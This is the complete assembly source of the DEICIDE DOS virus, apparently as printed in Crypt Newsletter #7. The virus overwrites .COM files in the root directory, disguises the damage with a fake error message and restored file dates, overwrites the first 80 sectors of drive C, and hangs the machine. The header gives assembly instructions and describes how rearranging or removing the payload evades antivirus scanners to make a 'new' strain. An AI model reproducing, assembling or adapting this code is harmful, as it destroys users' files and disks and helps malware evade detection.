;***************************************************************************
; Source code of the DEICIDE Virus, original author: Glen Benton
; Assemble with A86 - Sanitized, English-ized and spruced up for inclusion
; in Crypt Newsletter #7.  The Crypt reader will also notice the
; DEICIDE listing has NO declarative red tape - no org's, no assume
; cs,ds,es stuff, no start/ends pairs or proc labels.  For the average
; reader, this means TASM and MASM will choke if you try to get them to
; assemble this as is. A86 doesn't need it, as Isaacson is fond of saying,
; and this listing can be assembled directly to a .COMfile
; without the need of a linker.
;
; DEICIDE virus is a kamikaze overwriting .COM infector, with a length 
; of 666 bytes in its original state. With A86, you get 665 bytes, which, we
; assume ruins, the 'aesthetics' of things just a bit. (Try adding a NOP
; to the listing if this bugs you too much.) Anyway, on call DEICIDE
; jumps right to the root directory where it looks for a any .COM file
; except COMMAND.COM to infect.
;
; If all files are infected, and DEICIDE is not on the C drive it attempts to 
; ruin it anyway. If all files in the root on C are infected, the fixed disk 
; is destroyed, a message displayed and the computer hung. 
; If a program is successfully overwritten, DEICIDE exits to DOS 
; after displaying 'File corruption error.' If DEICIDE is trapped on
; a diskette that is write-protected, it will generate noxious 'Abort,
; Retry, Ignore, Fail' messages.
;
; You can work with DEICIDE quite easily by commenting out the destructive
; sequence and reassembling. Then it will merely mess up .COM's in
; your root directory. If you forget that you're using NDOS or 4DOS, DEICIDE
; will promptly foul your command processor and the operating system
; won't load properly when you reboot. In an interesting side note, 
; removing the destructive payload of DEICIDE causes SCAN to lose sight of
; DEICIDE. (There's a simple poor man's method to a 'new' strain. Fool
; your friends who think you've written a virus from scratch.)
; The DEBUG script of DEICIDE has the destructive payload "rearranged" and
; is not, strictly speaking, identical to this listing. This has made
; that copy of DEICIDE (referred to in the scriptfile as DEICIDE2) 
; functionally similar to the original, but 
; still invisible to SCAN v85b and a number of other commercial products.
; The lesson to be learned here is that software developers shouldn't choose
; generic disk overwriting payloads as signatures for their scanners.
;
; I must confess I'm fascinated by the mind that went into creating DEICIDE.
; Even in 1990, the DEICIDE was more of a 'hard disk bomb' than a virus.
; Think a moment. How many files are in your root directory? How long before
; this sucker activated and spoiled your afternoon? Once? Twice? In
; any case, it still is an easily understood piece of code, enjoying its
; own unique charm. Enjoy looking at DEICIDE. Your virus pal, URNST KOUCH.
;***************************************************************************

Start_Prog:     jmp short Start_Virus
                nop

Message         db 0Dh,0Ah,'DEICIDE!'
                db 0Dh,0Ah
                db 0Dh,0Ah,'Glenn (666) says : BYE BYE HARDDISK!!'
                db 0Dh,0Ah
                db 0Dh,0Ah,'Next time be carufull with illegal stuff......$'

Start_Virus:    mov ah,19h                      ; Get actual drive
                int 21h

                db 0A2h                         ; Mov [EA],al
                dw offset Infect_Drive
                db 0A2h                     ; A86 assembles this differently
                dw offset Actual_Drive      ; so put the original code here

                mov ah,47h                 ; Get actual directory
                mov dl,0
                mov si,offset Actual_Dir
                int 21h

                mov ah,1Ah                 ; stash DTA in safe place
                mov dx,offset New_DTA
                int 21h

Infect_Next:    mov ah,3Bh                 ; DOS chdir function, go to root dir
                mov dx,offset Root_Dir
                int 21h

                mov ah,4Eh                 ; Search first .COM file
                mov cx,0
                mov dx,offset Search_Path  ; using file mask
                int 21h

Check_Command:  mov al,'D'         ; Check if 7th char is a 'D' (To prevent
                cmp [New_DTA+24h],al       ; infecting COMMAND.COM, causing 
                jnz Check_Infect           ; noticeable boot failure)
                jmp short Search_Next
                nop

Check_Infect:   mov ah,3Dh             ; Open found file with write access
                mov al,2
                mov dx,offset New_DTA+1Eh
                int 21h
                mov File_Handle,ax              ; Save handle
                mov bx,ax

                mov ah,57h                      ; Get date/time of file
                mov al,0                        ; why, for Heaven's sake?
                int 21h
                mov File_Date,dx
                mov File_Time,cx

                call Go_Beg_File                ; Go to beginning of file

                mov ah,3Fh                      ; Read first 2 bytes
                mov cx,2
                mov dx,offset Read_Buf          ; into a comparison buffer
                int 21h

                mov al,byte ptr [Read_Buf+1]   ; now, take a look at the
                cmp al,offset Start_Virus-102h ; buffer and the start of
                jnz Infect                     ; DEICIDE. Is it the
                                               ; jump? If not, infect file
                mov ah,3Eh                  ; Already infected, so close file
                int 21h

Search_Next:    mov ah,4Fh                  ; Search next file function
                int 21h
                jnc Check_Command           ; No error - try this file

                mov al,Infect_Drive         ; Skip to next drive,
                cmp al,0                     
                jnz No_A_Drive               
                inc al
No_A_Drive:     inc al
                cmp al,3                   ; Is the drive C:?
                jnz No_Destroy             ; 
                                           ; if it is and haven't been
                                           ; able to infect
                mov al,2                   ; Overwrite first 80 sectors, 
                mov bx,0                   ; BUMMER!
                mov cx,50h                 ; BUMMER!
                mov dx,0                   ; BUMMER!
                int 26h                    ; BUMMER!
                
                mov ah,9                   ; Show silly message 
                mov dx,offset Message
                int 21h
                

Lock_System:    jmp short Lock_System  ; lock up the system so the poor fool
                                     ; has to start reloading right away 
No_Destroy:     mov dl,al                          ; New actual drive
                mov ah,0Eh
                mov Infect_Drive,dl                ; Save drive number.
                int 21h

                jmp Infect_Next

Infect:         call Go_Beg_File          ;call seek routine

                mov ah,40h                ; Write DEICIDE to the file
                mov cx,offset End_Virus-100h  ;right over the top, starting
                mov dx,100h               ; at the beginning, thus messing
                int 21h                   ; up everything

                mov ah,57h                      ; Restore date/time of file
                mov al,1                        ; why, for God's sake? You 
                mov cx,File_Time                ; think no one will notice
                mov dx,File_Date                ; file is destroyed?
                int 21h

                mov ah,3Eh                       ; Close file, let's be neat
                int 21h

                mov dl,byte ptr [Actual_Drive]   ; Back to original drive
                mov ah,0Eh
                int 21h

                mov ah,3Bh                       ; And original dir
                mov dx,offset Actual_Dir
                int 21h

                mov ah,9                      ; Show 'File corruption error.'
                mov dx,offset Quit_Message    ; when destroyed, infected 
                int 21h                       ; program misfires and DEICIDE
                                          ; executes so user may be placated
                int 20h                   ; Exit back to DOS

Go_Beg_File:    mov ah,42h                ; Procedure: seek to start of file
                mov al,0
                mov cx,0
                mov dx,0
                int 21h
                ret


File_Date       dw (?)
File_Time       dw (?)

File_Handle     dw (?)

Infect_Drive    db (?)

Root_Dir        db '\',0

Search_Path     db '*.COM',0

Read_Buf        db 2 dup (?)

Actual_Drive    db (?)


Quit_Message    db 'File corruption error.',0Dh,0Ah,'$'

New_DTA         db 2Bh dup (?)

Actual_Dir      db 40h dup (?)

                db 'This experimental virus was written by Glenn Benton to '
                db 'see if I can make a virus while learning machinecode for '
                db '2,5 months. (C) 10-23-1990 by Glenn. I keep on going '
                db 'making virusses.'

End_Virus: